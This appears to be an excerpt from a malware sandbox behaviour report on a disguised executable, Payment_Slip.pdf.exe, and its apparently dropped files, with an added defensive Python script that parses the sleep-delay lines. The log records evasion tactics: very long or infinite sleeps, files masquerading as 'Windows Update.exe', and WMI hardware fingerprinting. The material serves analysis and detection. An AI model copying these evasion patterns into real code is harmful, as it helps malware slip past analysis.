Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6663
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3087
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: threadDelayed 1007
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: threadDelayed 8521
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: foregroundWindowGot 1735
Source: C:\Users\user\AppData\Roaming\host.exe Window / User API: threadDelayed 4895
Source: C:\Users\user\AppData\Roaming\host.exe Window / User API: threadDelayed 4899
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window / User API: threadDelayed 4837
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window / User API: threadDelayed 4878
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 3777
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 6042
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 5250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 4533
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 6915
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 2929
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 5278
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 4521
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\dwn.exe API coverage: 4.6 %
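The "Thread delayed" lines above and the per-thread "Thread sleep count" / "Thread sleep time" lines that follow are the raw evidence behind the report's "Delayed program exit" finding. The script below is an added triage example, not Joe Sandbox code: it parses these three line shapes, drops the "Jump to behavior" link text, and re-applies the thresholds the report itself prints (count > 30, accumulated time >= 30000). Three things it derives are not stated by the report and are assumptions of this example: the value 922337203685477 equals Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue in whole milliseconds, so it is treated as an unbounded .NET wait; a run of delays that shrink by a small step (1200000, 1199875, 1199765, ...) is treated as one timed wait re-armed with the time remaining; and the "s" suffix on the sleep-time values is read as milliseconds, because 209 sleeps totalling 104500 give an even 500 per call. The 10-minute long-wait cut-off and the 1-second step limit are assumed triage parameters, and the sample lines are copied from this report.

```python
"""Triage helper for sandbox 'Thread delayed' / 'Thread sleep' lines (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Thresholds exactly as the report prints them ("count: 209 > 30", "-104500s >= -30000s").
SLEEP_COUNT_THRESHOLD = 30
SLEEP_TIME_THRESHOLD_MS = 30_000
# Int64.MaxValue ticks / 10_000 ticks per ms == 922337203685477 (TimeSpan.MaxValue in ms).
# Assumption: this is how an unbounded .NET wait shows up in the report.
INFINITE_SENTINEL_MS = (2**63 - 1) // 10_000
LONG_WAIT_MS = 10 * 60 * 1_000      # assumed triage cut-off: 10 minutes
COUNTDOWN_MAX_STEP_MS = 1_000       # assumed: a re-armed wait shrinks by well under 1 s per step

_DELAY = re.compile(r"^Source: (?P<src>.+?) Thread delayed: delay time: (?P<ms>\d+)")
_SLEEP_TIME = re.compile(r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")
_SLEEP_COUNT = re.compile(r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+)")

# Constructed sample: lines copied from this report, including the link residue.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1200000",
    r"Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199875",
    r"Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199765",
    r"Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599875",
    r"Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep count: 209 > 30 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep time: -104500s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep count: 8521 > 30 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep time: -25563000s >= -30000s Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exe TID: 7712 Thread sleep time: -30000s >= -30000s Jump to behavior",
]


@dataclass
class SleepStats:
    delays_ms: list = field(default_factory=list)       # 'Thread delayed' values, in report order
    sleep_count: dict = field(default_factory=dict)     # tid -> largest count reported
    sleep_time_ms: dict = field(default_factory=dict)   # tid -> largest accumulated total reported


def parse_sleep_lines(lines):
    """Group the three line shapes by source executable; other lines are ignored."""
    stats = defaultdict(SleepStats)
    for raw in lines:
        line = raw.strip().removesuffix("Jump to behavior").rstrip()
        if m := _DELAY.match(line):
            stats[m["src"]].delays_ms.append(int(m["ms"]))
        elif m := _SLEEP_TIME.match(line):
            s = stats[m["src"]]
            s.sleep_time_ms[m["tid"]] = max(s.sleep_time_ms.get(m["tid"], 0), int(m["ms"]))
        elif m := _SLEEP_COUNT.match(line):
            s = stats[m["src"]]
            s.sleep_count[m["tid"]] = max(s.sleep_count.get(m["tid"], 0), int(m["n"]))
    return dict(stats)


def countdown_runs(delays_ms):
    """Return (first, last, length) for each run of consecutive delays that shrink by a small step,
    e.g. 1200000, 1199875, 1199765: consistent with one timed wait re-armed with the remainder."""
    runs, start = [], 0
    for i in range(1, len(delays_ms) + 1):
        contiguous = i < len(delays_ms) and 0 < delays_ms[i - 1] - delays_ms[i] <= COUNTDOWN_MAX_STEP_MS
        if not contiguous:
            if i - start >= 2:
                runs.append((delays_ms[start], delays_ms[i - 1], i - start))
            start = i
    return runs


def sleep_loops(stats):
    """tid -> (calls, average ms per call) for threads over the report's own count threshold."""
    return {tid: (n, stats.sleep_time_ms[tid] // n)
            for tid, n in stats.sleep_count.items()
            if n > SLEEP_COUNT_THRESHOLD and tid in stats.sleep_time_ms}


def classify(stats_by_src):
    """Human-readable findings per source; an empty list means nothing beyond the sandbox threshold."""
    findings = {}
    for src, s in stats_by_src.items():
        f = []
        if any(d >= INFINITE_SENTINEL_MS for d in s.delays_ms) or \
                any(t >= INFINITE_SENTINEL_MS for t in s.sleep_time_ms.values()):
            f.append("infinite wait")
        finite = [d for d in s.delays_ms if d < INFINITE_SENTINEL_MS]
        if finite and max(finite) >= LONG_WAIT_MS:
            f.append(f"long wait {max(finite) // 60_000} min")
        for first, last, n in countdown_runs(s.delays_ms):
            f.append(f"re-armed wait {first}->{last} ms x{n}")
        for tid, (n, avg) in sleep_loops(s).items():
            f.append(f"sleep loop tid {tid}: {n} x {avg} ms")
        findings[src] = f
    return findings


if __name__ == "__main__":
    for src, f in classify(parse_sleep_lines(SAMPLE_LINES)).items():
        print(src, "->", f or "nothing beyond threshold")
```

Run against the sample, the two Payment_Slip.pdf.exe threads come out as 209 x 500 ms and 8521 x 3000 ms, i.e. periodic polling loops rather than a single start-up delay, host.exe shows 20-minute and 10-minute re-armed waits, and the svchost.exe line, which sits exactly at the 30000 threshold, yields no finding.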
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep count: 209 > 30
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep time: -104500s >= -30000s
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep count: 1007 > 30
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep time: -3021000s >= -30000s
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep count: 8521 > 30
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep time: -25563000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe TID: 7876 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7712 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199655s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199546s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199437s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599644s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599441s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599263s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599155s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598710s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598043s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597390s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597168s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597051s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\conserver.exe TID: 7888 Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428 Thread sleep count: 3777 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428 Thread sleep count: 6042 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199758s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199631s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199380s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199078s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599869s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599764s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598889s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598669s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -598012s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597397s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596952s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596624s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -596077s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595749s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595421s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595202s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -595041s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594935s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594820s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8700 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892 Thread sleep count: 5278 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892 Thread sleep count: 4521 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199672s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -1199530s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598662s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597358s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -597029s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595827s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595714s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595588s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904 Thread sleep time: -595250s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
